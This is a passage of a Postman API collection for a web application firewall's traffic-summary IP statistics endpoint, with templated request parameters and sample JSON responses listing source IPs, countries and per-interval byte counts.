{{api-key-secret}}","type":"text"}],"url":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/ip_statistics?type={{type}}&start_time={{start_time}}&end_time={{end_time}}&page={{page}}&size={{size}}&sort_by={{sort_by}}&dir={{req}}&filter={{filter}}","urlObject":{"protocol":"https","path":["v1","application",":ep_id","traffic_summary","ip_statistics"],"host":["api","fortiweb-cloud-qa","com"],"query":[{"description":{"content":"<p>the type of query result, only support \"summary\" and \"detail\"</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>the start time of timespan</p>\n","type":"text/plain"},"key":"start_time","value":"{{start_time}}"},{"description":{"content":"<p>the end time of timespan</p>\n","type":"text/plain"},"key":"end_time","value":"{{end_time}}"},{"description":{"content":"<p>the page number of requested information</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>the result table size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>The field which will be sorted</p>\n","type":"text/plain"},"key":"sort_by","value":"{{sort_by}}"},{"description":{"content":"<p>the direction of the statistics only support \"req\" and \"res\"</p>\n","type":"text/plain"},"key":"dir","value":"{{req}}"},{"description":{"content":"<p>For example, for the IP details table, the filter is \"{“srccountry\": “canada, united state”, \"src\": “207.10.*.*”}</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[{"id":"ff9fda98-64a9-4e1d-9077-1edd780af353","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"18fee16f-d492-46b1-8700-dea3a18004a7","name":"Get Traffic Log IP Statics Request Summary One Hour","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/ip_statistics?type=summary&start_time=1660326562527&end_time=1660330162527&dir=req","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","ip_statistics"],"query":[{"key":"type","value":"summary"},{"key":"start_time","value":"1660326562527"},{"key":"end_time","value":"1660330162527"},{"key":"page","value":"{{page}}","disabled":true},{"key":"size","value":"{{size}}","disabled":true},{"key":"sort_by","value":"{{sort_by}}","disabled":true},{"key":"dir","value":"req"},{"key":"filter","value":"{{filter}}","disabled":true}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"96.45.34.121\": {\n            \"average_http_request_bytes\": 9130,\n            \"count\": 28,\n            \"country\": \"United States\"\n        },\n        \"15.165.25.45\": {\n            \"average_http_request_bytes\": 166,\n            \"count\": 1,\n            \"country\": \"Republic Of Korea\"\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660326562527\",\n        \"end\": \"1660330162527\",\n        \"count\": 13,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660326300000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660326900000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660327500000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660327800000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660328100000,\n                \"data\": [\n                    {\n                        \"source\": \"15.165.25.45\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 166,\n                            \"count_sum\": 1\n                        }\n                    },\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 399,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 1099,\n                            \"count_sum\": 7\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660328700000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 830,\n                            \"count_sum\": 5\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 5590,\n                            \"count_sum\": 10\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660329300000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 1212,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660329900000,\n                \"data\": []\n            }\n        ]\n    }\n}"},{"id":"c84f7279-8006-49a6-8f16-776401fc8068","name":"Get Traffic Log IP Statics Request Detail One Hour","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/ip_statistics?ip_statistics?type=details&start_time=1660326705761&end_time=1660330305761&page=1&size=5&sort_by=average_http_request_bytes_sum&dir=req&filter=%7B%22srccountry%22%3A%22United%20States%22%7D","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","ip_statistics"],"query":[{"key":"ip_statistics?type","value":"details"},{"key":"start_time","value":"1660326705761"},{"key":"end_time","value":"1660330305761"},{"key":"page","value":"1"},{"key":"size","value":"5"},{"key":"sort_by","value":"average_http_request_bytes_sum"},{"key":"dir","value":"req"},{"key":"filter","value":"%7B%22srccountry%22%3A%22United%20States%22%7D"}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"96.45.34.121\": {\n            \"average_http_request_bytes\": 9130,\n            \"count\": 28,\n            \"country\": \"United States\"\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660326705761\",\n        \"end\": \"1660330305761\",\n        \"count\": 13,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660326900000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660327500000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660327800000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660328100000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 399,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 1099,\n                            \"count_sum\": 7\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660328700000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 830,\n                            \"count_sum\": 5\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 5590,\n                            \"count_sum\": 10\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660329300000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_request_bytes_sum\": 1212,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660329900000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660330200000,\n                \"data\": []\n            }\n        ]\n    }\n}"},{"id":"817e12b0-4cbb-43f9-8394-a67f824c50f0","name":"Get Traffic Log IP Statics Response Summary 24 Hour","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/ip_statistics?type=summary&start_time=1660340312722&end_time=1660253912722&dir=res","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","ip_statistics"],"query":[{"key":"type","value":"summary"},{"key":"start_time","value":"1660340312722"},{"key":"end_time","value":"1660253912722"},{"key":"page","value":"{{page}}","disabled":true},{"key":"size","value":"{{size}}","disabled":true},{"key":"sort_by","value":"{{sort_by}}","disabled":true},{"key":"dir","value":"res"},{"key":"filter","value":"{{filter}}","disabled":true}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"96.45.34.121\": {\n            \"average_http_response_bytes\": 197232,\n            \"count\": 47,\n            \"country\": \"United States\"\n        },\n        \"52.112.95.38\": {\n            \"average_http_response_bytes\": 1221,\n            \"count\": 3,\n            \"country\": \"United States\"\n        },\n        \"15.165.25.45\": {\n            \"average_http_response_bytes\": 4985,\n            \"count\": 1,\n            \"country\": \"Republic Of Korea\"\n        },\n        \"173.214.130.2\": {\n            \"average_http_response_bytes\": 458,\n            \"count\": 1,\n            \"country\": \"Canada\"\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660253995829\",\n        \"end\": \"1660340395829\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660253400000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660254000000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 584,\n                            \"count_sum\": 2\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 15056,\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 458,\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 14949,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"15.165.25.45\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 4985,\n                            \"count_sum\": 1\n                        }\n                    },\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 14949,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 59796,\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 60169,\n                            \"count_sum\": 13\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 458,\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 25830,\n                            \"count_sum\": 7\n                        }\n                    },\n                    {\n                        \"source\": \"173.214.130.2\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 458,\n                            \"count_sum\": 1\n                        }\n                    },\n                    {\n                        \"source\": \"52.112.95.38\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 1221,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 4983,\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660339800000,\n                \"data\": []\n            }\n        ]\n    }\n}"},{"id":"db2607e5-cf1e-44c1-8d13-53321021f9fc","name":"Get Traffic Log IP Statics Response 24 Hour Detail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summaryip_statistics?type=details&start_time=1660254067394&end_time=1660340467394&page=1&size=5&sort_by=average_http_response_bytes_sum&dir=res&filter=%7B%22srccountry%22%3A%22United%20States%22%7D","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summaryip_statistics"],"query":[{"key":"type","value":"details","description":"the type of query result, only support \"summary\" and \"detail\""},{"key":"start_time","value":"1660254067394","description":"the start time of timespan"},{"key":"end_time","value":"1660340467394","description":"the end time of timespan"},{"key":"page","value":"1","description":"the page number of requested information"},{"key":"size","value":"5","description":"the result table size"},{"key":"sort_by","value":"average_http_response_bytes_sum","description":"The field which will be sorted"},{"key":"dir","value":"res","description":"the direction of the statistics only support \"req\" and \"res\""},{"key":"filter","value":"%7B%22srccountry%22%3A%22United%20States%22%7D","description":"For example, for the IP details table, the filter is \"{“srccountry\": “canada, united state”, \"src\": “207.10.*.*”}"}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"96.45.34.121\": {\n            \"average_http_response_bytes\": 197232,\n            \"count\": 47,\n            \"country\": \"United States\"\n        },\n        \"52.112.95.38\": {\n            \"average_http_response_bytes\": 1221,\n            \"count\": 3,\n            \"country\": \"United States\"\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660254113533\",\n        \"end\": \"1660340513533\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254000000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 584,\n                            \"count_sum\": 2\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 15056,\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n      